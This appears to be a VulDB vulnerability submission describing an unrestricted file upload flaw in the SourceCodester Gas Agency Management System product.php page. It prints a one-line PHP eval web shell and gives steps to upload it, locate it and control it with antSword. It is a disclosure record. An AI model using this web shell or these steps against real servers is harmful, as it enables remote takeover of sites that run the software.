| Titel | sourcecodester Gas Agency Management System /gasmark/product.php exists unrestricted upload |
|---|
| Beschreibung | File uploading is not filtered, and uploading a sentence is caused by a Trojan horse getshell
upload shell like this
```php
<?php @eval($_POST['shell']);?>
```
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/oneWorld.png
Then we check it
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/Check.png
then we can see it in /gasmark/assets/myimages/oneWord.php
Use antSword to getshell
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/getShell.png
The source code website is https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
|---|
| Benutzer | Drunkbaby (UID 30821) |
|---|
| Einreichung | 11.08.2022 12:52 (vor 4 Jahren) |
|---|
| Moderieren | 11.08.2022 13:44 (52 minutes later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 206173 [SourceCodester Gas Agency Management System oneWord.php shell erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|